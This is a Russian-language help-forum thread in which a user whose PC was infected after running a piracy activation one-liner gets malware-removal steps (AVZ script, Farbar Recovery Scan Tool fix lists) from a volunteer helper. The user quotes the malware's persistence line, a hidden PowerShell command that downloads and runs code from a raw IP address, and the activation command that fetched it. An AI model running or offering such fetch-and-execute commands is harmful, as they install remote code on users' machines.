Вирус в PowerShell

[VanyeJ]

Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: 
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту: 
Причина: Облачная защита

Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.

CollectionLog-2025.02.08-15.48.zip

[VanyeJ]

в логе увидел
C:\Windows\system32\tasks\SecurityHealthSystray - powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')"




Нашёл данную строку в SecurityHealthSystray, может просто ее снести?

 

[thyrex]

Здравствуйте.

 

Запустите AVZ из папки Autologger от имени Администратора по правой кнопке мыши.

 

Выполните скрипт в AVZ (Файл – Выполнить скрипт – вставить текст скрипта из окна Код)

begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 DeleteSchedulerTask('SecurityHealthSystray');
ExecuteSysClean;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

[VanyeJ]

нашел его в планировщике задач

 

[thyrex]

Выполняйте то, что написано выше, а не занимайтесь самодеятельностью.

[VanyeJ]

CollectionLog-2025.02.08-16.49.zip

[thyrex]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[VanyeJ]

CollectionLog-2025.02.08-16.49.zipLogs.zip

[thyrex]

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)

O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Features: [TamperProtection] = (missing)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=euc-jp: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=ISO-8859-1: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=MS936: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=MS949: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=MS950: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=UTF8: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica; charset=UTF-8: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=euc-jp: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=ISO-8859-1: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=MS936: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=MS949: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=MS950: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=UTF8: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-ica;charset=UTF-8: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\ica: [CLSID] = {CFB6322E-CC85-4d1b-82C7-893888A236BC} - (no file)

 

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:home;windowsdefender
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
Task: {17C2E7E1-51B3-4F45-8EA8-3D8334DB66CF} - \Microsoft\Windows\Management\Provisioning\Logon -> Нет файла <==== ВНИМАНИЕ
Task: {2C029964-C784-4143-B9FD-073C230855CB} - \Microsoft\Windows\Application Experience\AitAgent -> Нет файла <==== ВНИМАНИЕ
Task: {3047C197-66F1-4523-BA92-6C955FEF9E4E} - \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser -> Нет файла <==== ВНИМАНИЕ
Task: {3279446F-FD1A-4BDB-A9C1-0985306A14E0} - \Microsoft\Windows\PI\Sqm-Tasks -> Нет файла <==== ВНИМАНИЕ
Task: {36A1CD88-920A-4A62-BEF3-68538A8ACF6B} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector -> Нет файла <==== ВНИМАНИЕ
Task: {385EB27E-5315-4FC5-8EF9-ED1851D7A49C} - \Microsoft\Windows\FileHistory\File History (maintenance mode) -> Нет файла <==== ВНИМАНИЕ
Task: {40BE462C-E34F-46E4-A8B9-0F95196EF93F} - \Microsoft\Windows\SettingSync\BackgroundUploadTask -> Нет файла <==== ВНИМАНИЕ
Task: {61012F9B-FFD6-4E36-BD45-42CE5AC83FC1} - \Microsoft\Windows\Application Experience\MareBackup -> Нет файла <==== ВНИМАНИЕ
Task: {76A4CE35-4165-4B59-BD0D-2EFA1E1D355E} - \Microsoft\Windows\CloudRestore\Restore -> Нет файла <==== ВНИМАНИЕ
Task: {780E487D-C62F-4B55-AF84-0E38116AFE07} - \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask -> Нет файла <==== ВНИМАНИЕ
Task: {85CA1566-018A-4A57-8DCA-E879538AF730} - \Microsoft\Windows\CloudRestore\Backup -> Нет файла <==== ВНИМАНИЕ
Task: {A01CBA68-8954-4C51-BEFF-37A017DAA227} - \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver -> Нет файла <==== ВНИМАНИЕ
Task: {A0C71CB8-E8F0-498A-901D-4EDA09E07FF4} - \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp -> Нет файла <==== ВНИМАНИЕ
Task: {B86F17B7-0298-4679-9BEA-3567E58A7D51} - \Microsoft\Windows\Application Experience\SdbinstMergeDbTask -> Нет файла <==== ВНИМАНИЕ
Task: {BE535911-DF29-46F3-81B4-B6564853B1CB} - \Microsoft\Windows\SettingSync\NetworkStateChangeTask -> Нет файла <==== ВНИМАНИЕ
Task: {DB351805-180A-4A8A-A7FB-048D230942B2} - \Microsoft\Windows\Application Experience\StartupAppTask -> Нет файла <==== ВНИМАНИЕ
Task: {E1FFB305-A037-4FDF-8367-91F90D903BAC} - \Microsoft\Windows\SettingSync\BackupTask -> Нет файла <==== ВНИМАНИЕ
Task: {E292525C-72F1-482C-8F35-C513FAA98DAE} - \Microsoft\Windows\Application Experience\ProgramDataUpdater -> Нет файла <==== ВНИМАНИЕ
Task: {E4FED5BC-D567-4044-9642-2EDADF7DE108} - \Microsoft\Windows\Customer Experience Improvement Program\Consolidator -> Нет файла <==== ВНИМАНИЕ
Task: {F3475DC3-625B-48EA-B471-DDB64F03977D} - \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem -> Нет файла <==== ВНИМАНИЕ
Task: {FD607F42-4541-418A-B812-05C32EBA8626} - \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip -> Нет файла <==== ВНИМАНИЕ
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Нет файла)
AlternateDataStreams: C:\Windows\tracing:? [16]
AlternateDataStreams: C:\Users\User\AppData\Local\Temp:$DATA [16]
FirewallRules: [TCP Query User{C83C0E5A-5EBD-4A83-A8AA-8280505BA171}C:\game\steam\steamapps\common\naraka bladepoint\narakabladepoint.exe] => (Allow) C:\game\steam\steamapps\common\naraka bladepoint\narakabladepoint.exe => Нет файла
FirewallRules: [UDP Query User{B1FFE127-3103-4DCB-9113-7C2BDF511FAF}C:\game\steam\steamapps\common\naraka bladepoint\narakabladepoint.exe] => (Allow) C:\game\steam\steamapps\common\naraka bladepoint\narakabladepoint.exe => Нет файла
FirewallRules: [TCP Query User{0755083B-E31F-498C-B582-4D0D76654A31}C:\game\steam\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe] => (Allow) C:\game\steam\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe => Нет файла
FirewallRules: [UDP Query User{81A68940-ABFA-47B8-8442-ED3702FFA1EF}C:\game\steam\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe] => (Allow) C:\game\steam\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe => Нет файла
FirewallRules: [TCP Query User{047C7F20-87D6-4B98-9F96-F987EF50DEBD}C:\game\steam\steamapps\common\marvelrivals\marvelgame\marvel\binaries\win64\marvel-win64-shipping.exe] => (Allow) C:\game\steam\steamapps\common\marvelrivals\marvelgame\marvel\binaries\win64\marvel-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{1FC2D0F8-EA76-41C1-B7C6-2D7042DB499D}C:\game\steam\steamapps\common\marvelrivals\marvelgame\marvel\binaries\win64\marvel-win64-shipping.exe] => (Allow) C:\game\steam\steamapps\common\marvelrivals\marvelgame\marvel\binaries\win64\marvel-win64-shipping.exe => Нет файла
FirewallRules: [{DF485C57-E2A8-4A86-ACFB-D7906DB5F53C}] => (Allow) C:\Game\Steam\steamapps\common\Deadlock\game\bin\win64\project8.exe => Нет файла
FirewallRules: [{3179373E-6792-43AF-8312-39225593D7A6}] => (Allow) C:\Game\Steam\steamapps\common\Deadlock\game\bin\win64\project8.exe => Нет файла
FirewallRules: [TCP Query User{EFB059C2-EE35-43A7-9B8F-7F4EC9633309}C:\game\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\game\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => Нет файла
FirewallRules: [UDP Query User{E9334903-BAE8-4DF1-9973-C152BB12DCB9}C:\game\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\game\steam\steamapps\common\cyberpunk 2077\bin\x64\cyberpunk2077.exe => Нет файла
FirewallRules: [TCP Query User{5A87B63C-E4EC-4BBE-8D9E-5192FD5AF94C}C:\game\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\game\steam\steamapps\common\red dead redemption 2\rdr2.exe => Нет файла
FirewallRules: [UDP Query User{CD70E56F-9154-4995-BC93-B15D3475508A}C:\game\steam\steamapps\common\red dead redemption 2\rdr2.exe] => (Allow) C:\game\steam\steamapps\common\red dead redemption 2\rdr2.exe => Нет файла
FirewallRules: [TCP Query User{56C66F33-02B4-4D00-8FEF-BE9812D451CF}C:\game\gunfire reborn\gunfire reborn.exe] => (Allow) C:\game\gunfire reborn\gunfire reborn.exe => Нет файла
FirewallRules: [UDP Query User{1E6E841D-0FEF-4308-BC5B-EF79AC00D539}C:\game\gunfire reborn\gunfire reborn.exe] => (Allow) C:\game\gunfire reborn\gunfire reborn.exe => Нет файла
FirewallRules: [TCP Query User{A4AA5249-A444-4A89-B2FF-9F98CD395FF2}C:\game\roboquest\roboquest\binaries\win64\roboquest-win64-shipping.exe] => (Allow) C:\game\roboquest\roboquest\binaries\win64\roboquest-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{5E724077-5BAB-4F29-BE8A-C445D68D0DFE}C:\game\roboquest\roboquest\binaries\win64\roboquest-win64-shipping.exe] => (Allow) C:\game\roboquest\roboquest\binaries\win64\roboquest-win64-shipping.exe => Нет файла
FirewallRules: [{2E3B6AD6-A9EB-4817-B5CB-7285026F6C7B}] => (Allow) C:\Game\Steam\steamapps\common\SMITE 2\Windows\Hemingway.exe => Нет файла
FirewallRules: [{FDEB4EC0-F9B3-4912-86B8-FE09D74BFF04}] => (Allow) C:\Game\Steam\steamapps\common\SMITE 2\Windows\Hemingway.exe => Нет файла
FirewallRules: [TCP Query User{5D26B2F6-A853-4A28-B134-BD0DF5B6DA73}C:\game\steam\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) C:\game\steam\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{96853B8D-84A4-4F9A-A001-3B4A526AF252}C:\game\steam\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) C:\game\steam\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{99C41C56-7ED9-45A7-BC15-C0A68B89DDFB}C:\game\steam\steamapps\common\destiny 2\destiny2.exe] => (Allow) C:\game\steam\steamapps\common\destiny 2\destiny2.exe => Нет файла
FirewallRules: [UDP Query User{C1B5B5C4-33BF-4ACC-B7F6-690F7A3524ED}C:\game\steam\steamapps\common\destiny 2\destiny2.exe] => (Allow) C:\game\steam\steamapps\common\destiny 2\destiny2.exe => Нет файла
FirewallRules: [{9B73F55A-0FF5-4EBA-AC60-FEAC9A5A3275}] => (Allow) C:\Game\Enlisted\launcher.exe => Нет файла
FirewallRules: [{A2C566F3-7301-4AE9-9372-2CAA1D3ADB83}] => (Allow) C:\Game\Enlisted\launcher.exe => Нет файла
FirewallRules: [{44323C16-3BE8-4831-8C0D-303E2553E13E}] => (Allow) C:\Game\Enlisted\bpreport.exe => Нет файла
FirewallRules: [{9BD4E744-DBDE-4A42-B3C7-ACCC6D675966}] => (Allow) C:\Game\Enlisted\bpreport.exe => Нет файла
FirewallRules: [{854A6BF6-BD6A-474F-8407-11EE2E0AD935}] => (Allow) C:\Game\Enlisted\gaijin_downloader.exe => Нет файла
FirewallRules: [{422EE131-3366-4D87-886F-07BBA451961C}] => (Allow) C:\Game\Enlisted\gaijin_downloader.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.